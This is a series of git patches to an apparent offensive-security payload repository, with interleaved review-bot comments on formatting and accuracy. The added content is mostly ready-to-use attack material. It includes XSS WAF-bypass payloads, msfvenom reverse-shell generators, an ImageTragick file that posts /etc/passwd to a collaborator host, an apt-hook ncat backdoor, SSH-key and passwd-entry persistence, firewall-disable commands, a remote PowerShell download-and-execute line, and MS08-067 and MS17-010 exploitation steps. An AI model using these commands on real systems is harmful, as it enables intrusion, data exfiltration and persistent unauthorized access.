From edcac293a860ce3182f3124f43d8facf7e7487b0 Mon Sep 17 00:00:00 2001 From: h1-ragnar <51418565+h1-ragnar@users.noreply.github.com> Date: Wed, 5 Jun 2019 21:36:41 +0300 Subject: [PATCH 001/222] Cloudflare XSS Bypasses by Bohdan Korzhynskyi --- XSS Injection/README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7a10f491..af9da316 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -876,6 +876,14 @@ Works for CSP like `script-src self` ## Common WAF Bypass +### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019 + +```html + + +xss'">
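Review bot: the ```html fence opened by this hunk is never closed among the visible added lines, so the rest of the Common WAF Bypass section would render as a code block until the next fence; confirm that a closing ``` follows the payloads. Minor: 'june' in the heading date should be 'June', and the attribution reads more naturally as 'by @Bohdan Korzhynskyi (3 June 2019)' than as a trailing ' - 3rd june 2019'.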

>/etc/passwd +su - dummy +``` + ## NFS Root Squashing @@ -526,6 +534,8 @@ lxc start mycontainer lxc exec mycontainer /bin/sh ``` +Alternatively https://github.com/initstring/lxd_root + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 227d80a7..a9d182f1 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -85,6 +85,7 @@ optional arguments: ```c portfwd list +portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 or 
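Review bot: `+Alternatively https://github.com/initstring/lxd_root` is a bare URL dropped directly under the closing fence, while the rest of this file links tools as `[name](url)` with a short description; make it a Markdown link that says what the script automates (the LXD container mount shown just above it), and keep a blank line between the fence and the paragraph so it is not read as part of the code block.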
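Review bot: `+portfwd add -l 88 -p 88 -r 127.0.0.1` is inserted without the explanation the neighbouring entries carry, and the block is tagged ```c although these are Meterpreter console commands. Add a trailing comment stating what the mapping is for (local port 88 to port 88 on the session host's own loopback, i.e. Kerberos as seen from the pivot) and tag the fence consistently with the `powershell` netsh block at the top of the same file.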
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 3975ad90..45e88b8c 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -172,6 +172,13 @@ List firewall's blocked ports $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports ``` +Disable firewall + +```powershell +netsh firewall set opmode disable +netsh advfirewall set allprofiles state off +``` + List all network shares ```powershell diff --git a/SAML Injection/README.md b/SAML Injection/README.md index 928b56eb..e244bfd1 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability, An XSLT can be carried out by using the `transform` element. -![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) +![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack) ```xml From f5a8a6b62faee0839c7aa49397d9aa11a4eb53a1 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 14:26:14 +0200 Subject: [PATCH 003/222] Meterpreter shell --- .../Metasploit - Cheatsheet.md | 4 +- .../Reverse Shell Cheatsheet.md | 47 +++++++++++++++++++ .../imagetragik2_burpcollaborator_passwd.jpg | 1 + 3 files changed, 51 insertions(+), 1 deletion(-) create mode 100644 Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index c7b99804..4ce0db76 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md 
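Review bot: the new `Disable firewall` block is wedged between two read-only enumeration snippets (`List firewall's blocked ports` above, `List all network shares` below) yet it changes host state and needs an elevated shell, so it breaks the enumeration flow; either move it next to other post-exploitation changes or add a line saying it requires administrator rights. The two commands are also alternatives rather than a sequence: `netsh firewall` is the legacy context that current Windows releases reject in favour of `netsh advfirewall`, so note which applies to which OS generation, and that toggling the firewall profile state is written to the Windows Firewall event log, which makes it a reliable detection point rather than a quiet step.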
@@ -58,7 +58,9 @@ set PAYLOAD generic/shell_reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 set ExitOnSession false -exploit -j + +generate -o /tmp/meterpreter.exe -f exe +to_handler [ctrl+a] + [d] ``` diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 41435de8..d20c8f73 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -21,6 +21,12 @@ * [Lua](#lua) * [NodeJS](#nodejs) * [Groovy](#groovy) +* [Meterpreter Shell](#meterpreter-shell) + * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) + * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) + * [Linux Staged reverse TCP](#linux-staged-reverse-tcp) + * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp) + * [Other platforms](#other-platforms) * [Spawn TTY Shell](#spawn-tty-shell) * [References](#references) 
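Review bot: replacing `exploit -j` with `generate -o /tmp/meterpreter.exe -f exe` and `to_handler` changes which module the block is assumed to be in: `generate` and `to_handler` are commands of a payload module selected with `use payload/...`, whereas the surrounding `set PAYLOAD generic/shell_reverse_tcp` and `set ExitOnSession false` are options of `exploit/multi/handler`, where neither command is available. State the `use` line the block starts from, or keep `exploit -j` as the handler step and show `generate`/`to_handler` as a separate payload-module example. The output name `/tmp/meterpreter.exe` also does not fit the `generic/shell_reverse_tcp` payload named above, which is not Meterpreter.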
@@ -231,6 +237,47 @@ String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` +## Meterpreter Shell + +### Windows Staged reverse TCP + +```powershell +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe +``` + +### Windows Stageless reverse TCP + +```powershell +$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe +``` + +### Linux Staged reverse TCP + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf +``` + +### Linux Stageless reverse TCP + +```powershell +$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf +``` + +### Other platforms + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh +$ msfvenom -p 
cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` + ## Spawn TTY Shell Access shortcuts, su, nano and autocomplete in a partially tty shell diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg new file mode 100644 index 00000000..358edb6c --- /dev/null +++ b/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg @@ -0,0 +1 @@ +push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context \ No newline at end of file From adcea1a9132d46a0c9fac0b770401326601acf12 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 16:05:44 +0200 Subject: [PATCH 004/222] Linux PrivEsc + SSH persistency --- Directory Traversal/README.md | 9 ++++ .../Linux - Persistence.md | 8 +++ .../Linux - Privilege Escalation.md | 1 + ...tion.md => Methodology and enumeration.md} | 0 .../Reverse Shell Cheatsheet.md | 2 +- .../Windows - Privilege Escalation.md | 54 +++++++++++++++++++ .../Windows - Using credentials.md | 38 +++++++------ README.md | 4 +- 8 files changed, 96 insertions(+), 20 deletions(-) rename Methodology and Resources/{Methodology_and_enumeration.md => Methodology and enumeration.md} (100%) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index b746ffa7..2be85205 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md 
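Review bot: the `Windows Stageless reverse TCP` and `Linux Stageless reverse TCP` subsections use `windows/shell_reverse_tcp` and `linux/x86/shell_reverse_tcp`, which are plain command shells, not Meterpreter; the stageless Meterpreter payloads follow the underscore naming that the `php/meterpreter_reverse_tcp` line at the bottom already uses (`windows/meterpreter_reverse_tcp`, `linux/x86/meterpreter_reverse_tcp`). Either rename those headings to say 'shell' or change the payload names so the section title `Meterpreter Shell` is accurate. Every fence in the section is also tagged ```powershell although the lines are Unix shell commands with `$` prompts.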
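Review bot: the new `imagetragik2_burpcollaborator_passwd.jpg` carries two placeholders (`https://example.123` and `xxx.burpcollaborator.net`) that nothing in this patch documents, and the file is MVG text with a `.jpg` extension. The Upload Insecure Files README that references these samples should say that the collaborator host must be replaced and why the file is not a real image, otherwise readers will assume the sample is broken.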
@@ -4,9 +4,18 @@ ## Summary +* [Tools](#tools) * [Basic exploitation](#basic-exploitation) * [Path Traversal](#path-traversal) +## Tools + +- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) + ```powershell + git clone https://github.com/wireghoul/dotdotpwn + perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b + ``` + ## Basic exploitation We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index a80c802f..f39abf5c 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -79,6 +79,14 @@ Next time "apt-get update" is done, your CMD will be executed! echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor ``` +## Backdooring the SSH + +Add an ssh key into the `~/.ssh` folder. + +1. `ssh-keygen` +2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys` +3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys + ## Tips Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index dfae6bd8..36820bcc 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -392,6 +392,7 @@ echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` +NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. ## NFS Root Squashing 
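Review bot: `Backdooring the SSH` never says which host each step runs on: `ssh-keygen` and the `~/.ssh/id_rsa.pub` path belong to the machine that keeps the private key, and only the public key is appended to `~/.ssh/authorized_keys` of the account on the target, but the numbered list reads as if all three steps happen on one box. Spell that out, and explain the modes in step 3 (with the default `StrictModes yes`, sshd ignores `authorized_keys` when the file or `~/.ssh` is writable by others), since a wrong mode is the usual reason a key is not accepted. From the defensive side it is worth one sentence that appended `authorized_keys` entries are among the first things file-integrity monitoring and audit rules on `~/.ssh` flag. Title: 'Backdooring SSH', without the article.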
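Review bot: the added `NOTE:` is inaccurate as written: on the BSDs `/etc/passwd` still exists (it simply carries no hashes), the hash-bearing equivalent of `/etc/shadow` is `/etc/master.passwd`, and `/etc/pwd.db` / `/etc/spwd.db` are the database files that `pwd_mkdb(8)` builds from it, not renamed copies of `passwd` and `shadow`. Reword it to say that, and add the missing blank line between the `NOTE:` paragraph and `## NFS Root Squashing`, which the hunk currently runs together.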
diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology and enumeration.md similarity index 100% rename from Methodology and Resources/Methodology_and_enumeration.md rename to Methodology and Resources/Methodology and enumeration.md diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index d20c8f73..41e0926b 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -282,7 +282,7 @@ $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw Access shortcuts, su, nano and autocomplete in a partially tty shell -/!\ OhMyZSH might break this trick, a simple `sh` is recommended +:warning: OhMyZSH might break this trick, a simple `sh` is recommended > The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 45e88b8c..5e820c0a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -17,6 +17,7 @@ * [EoP - Runas](#eop---runas) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures) * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) + * [MS08-067 (NetAPI)](#ms08-067-netapi) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) 
@@ -24,6 +25,9 @@ - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) + ```powershell + powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 + ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) ```powershell 
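Review bot: the usage snippet is attached to the entry explicitly marked `(Deprecated)` while Watson, listed just above it as the replacement, gets none; either move the example to Watson or say why the deprecated script is still the one demonstrated. The snippet also only runs `Sherlock.ps1` with `-File` and does not say what it prints or whether anything has to be invoked afterwards, so a reader cannot tell what output to expect.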
@@ -623,6 +627,37 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" ``` +### MS08-067 (NetAPI) + +Check the vulnerability with the following nmap script. + +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 +``` + +Metasploit modules to exploit `MS08-067 NetAPI`. + +```powershell +exploit/windows/smb/ms08_067_netapi +``` + +If you can't use Metasploit and only want a reverse shell. + +```powershell +https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows + +Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 +Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) +Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal +Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English +Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) +Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) +Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) +python ms08-067.py 10.0.0.1 6 445 +``` + + ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Check if the patch is installed : `wmic qfe list | find "3139914"` 
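Review bot: MS08-067 is a remote code execution flaw in the Server service reached over SMB, not a local privilege escalation, so it sits oddly under `EoP - Common Vulnerabilities and Exposures` in a privilege-escalation document (the same applies to the MS17-010 section it is modelled on); a one-line note that these are remote and listed here for lab completeness would avoid the confusion. Within the block the script names are inconsistent: the download URL and the final command use `ms08-067.py`, while the seven `Example:` lines use `MS08_067_2018.py`. As shown, the nmap line is tagged ```c and ends without a target, and the raw GitHub URL sits inside the ```powershell fence where it is neither a command nor a clickable link.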
@@ -639,12 +674,31 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc ### MS17-010 (Eternal Blue) +Check the vulnerability with the following nmap script. + ```c nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 ``` +Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. +```powershell +auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution +auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection +exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption +exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ +exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution +``` +If you can't use Metasploit and only want a reverse shell. + +```powershell +git clone https://github.com/helviojunior/MS17-010 + +# generate a simple reverse shell to use +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe +python2 send_and_execute.py 10.0.0.1 revshell.exe +``` ## References diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 1d32e8ce..0234bbbb 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -40,9 +40,9 @@ Password: pw123 ```c use auxiliary/scanner/smb/smb_login -set SMBDomain CSCOU -set SMBUser jarrieta -set SMBPass nastyCutt3r +set SMBDomain DOMAIN +set SMBUser username +set SMBPass password services -p 445 -R run creds 
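Review bot: the context line `--script smb-vuln-ms17–010` contains an en dash (U+2013) instead of a hyphen between `ms17` and `010`, so nmap cannot resolve the script name; since this hunk rewrites the surrounding lines, fix it here. Formatting: the fence after `Metasploit modules to exploit ...` and the one after `If you can't use Metasploit` follow their sentences without a blank line, unlike the rest of the file, and the module list runs each module path straight into its description, so a `#` separator or two columns would make it scannable.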
@@ -55,8 +55,8 @@ Note: the password can be replaced by a hash to execute a `pass the hash` attack ```c use exploit/windows/smb/psexec set RHOST 10.2.0.3 -set SMBUser jarrieta -set SMBPass nastyCutt3r +set SMBUser username +set SMBPass password set PAYLOAD windows/meterpreter/bind_tcp run shell @@ -66,8 +66,8 @@ shell ```python git clone https://github.com/byt3bl33d3r/CrackMapExec.github -python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r -python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami +python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password +python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami ``` ## Crackmapexec (Pass The Hash) 
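Review bot: the context line `git clone https://github.com/byt3bl33d3r/CrackMapExec.github` ends in `.github`, which is not a valid clone URL (`.git` is); since this hunk already edits the block, correct it. Credentials were swapped for placeholders here and in the psexec hunk above, but that hunk still hardcodes `set RHOST 10.2.0.3` while the host here became `10.10.10.10`; use one placeholder address throughout.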
@@ -79,23 +79,27 @@ cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:55 ## Winexe (Integrated to Kali) ```python -winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe +winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe ``` ## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) ```python git clone https://github.com/CoreSecurity/impacket.git -python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 +python psexec.py DOMAIN/username:password@10.10.10.10 +python smbexec.py DOMAIN/username:password@10.10.10.10 +python wmiexec.py DOMAIN/username:password@10.10.10.10 + +# psexec.exe -s cmd +# switch admin user to NT Authority/System ``` ## RDP Remote Desktop Protocol (Impacket) ```powershell -python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare +python rdpcheck.py DOMAIN/username:password@10.10.10.10 +rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare +rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 # -g : the screen will take up 70% of your actual screen size # -r disk:share : sharing a local folder during a remote desktop session ``` 
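Review bot: the new comment `# psexec.exe -s cmd` / `# switch admin user to NT Authority/System` is placed inside the Impacket section, but `-s` belongs to the Sysinternals `PsExec.exe`, which has its own `## PsExec (Windows - Sysinternal)` section further down where `cmd.exe -s # get System shell` already documents it; here it reads as though `psexec.py` took the same switch. Drop it from this block.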
@@ -137,21 +141,21 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 ## Netuse (Windows) ```powershell -net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r +net use \\ordws01.cscou.lab /user:DOMAIN\username password C$ ``` ## Runas (Windows - Kerberos auth) ```powershell -runas /netonly /user:CSCOU\jarrieta "cmd.exe" +runas /netonly /user:DOMAIN\username "cmd.exe" ``` ## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ) ```powershell -PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell ``` ## References diff --git a/README.md b/README.md index 4a990dc8..5b27360a 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I :heart: pull requests :) -You can also contribute with a beer IRL or with `buymeacoffee.com` +You can also contribute with a :beers: IRL or with `buymeacoffee.com` [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky) 
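Review bot: the user and password were generalised to `DOMAIN\username password`, but the target `\\ordws01.cscou.lab` in this hunk and in the PsExec hunk below still carries the old `cscou.lab` lab domain, so the examples now mix a placeholder domain with a real-looking hostname; replace the host with a placeholder such as `\\target.domain.local` for consistency with the `10.10.10.10` substitutions made elsewhere in this patch.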
@@ -22,7 +22,7 @@ You might also like the `Methodology and Resources` folder : - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md) - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md) - - [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md) + - [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md) - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md) - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md) - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) From e8cd11f88fd80193584d4e6a704b6b089516be73 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 18:13:15 +0200 Subject: [PATCH 005/222] plink + sshuttle : Network Pivoting Techniques --- File Inclusion/README.md | 5 +++ .../Network Pivoting Techniques.md | 34 +++++++++++++++++-- Upload Insecure Files/README.md | 22 ++++++++++++ 3 files changed, 58 insertions(+), 3 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 6c54db95..c6b17b15 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md 
@@ -6,6 +6,7 @@ ## Summary +* [Tools](#tools) * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) @@ -27,6 +28,10 @@ * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) +## Tools + +* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) + ## Basic LFI In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index a9d182f1..e35bc19f 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -1,5 +1,25 @@ # Network Pivoting Techniques +## Summary + +* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding) +* [SSH](#ssh) + * [SOCKS Proxy](#socks-proxy) + * [Local Port Forwarding](#local-port-forwarding) + * [Remote Port Forwarding](#remote-port-forwarding) +* [Proxychains](#proxychains) +* [Web SOCKS - reGeorg](#web-socks---regeorg) +* [Metasploit](#metasploit) +* [sshuttle](#sshuttle) +* [Rpivot](#rpivot) +* [plink](#plink) +* [ngrok](#ngrok) +* [Basic Pivoting Types](#basic-pivoting-types) + * [Listen - Listen](#listen---listen) + * [Listen - Connect](#listen---connect) + * [Connect - Connect](#connect---connect) +* [References](#references) + ## Windows netsh Port Forwarding ```powershell @@ -94,6 +114,13 @@ run autoroute -s 192.168.57.0/24 use auxiliary/server/socks4a ``` +## sshuttle + +```powershell +sshuttle -vvr user@10.10.10.10 10.1.1.0/24 +sshuttle -vvr username@pivot_host 10.2.2.0/24 +``` + ## Rpivot Server (Attacker box) 
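Review bot: the two `sshuttle` lines are the same example twice with different placeholder names; keep one and annotate its parts (`-r` names the SSH host used as the pivot, the trailing CIDR is the network whose traffic is routed through it, `-vv` is only verbosity). The fence is tagged ```powershell although sshuttle is a Unix-side tool. A caveat worth one line: sshuttle needs a Python interpreter on the pivot host and root or sudo locally to install its routing rules, both of which readers run into immediately.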
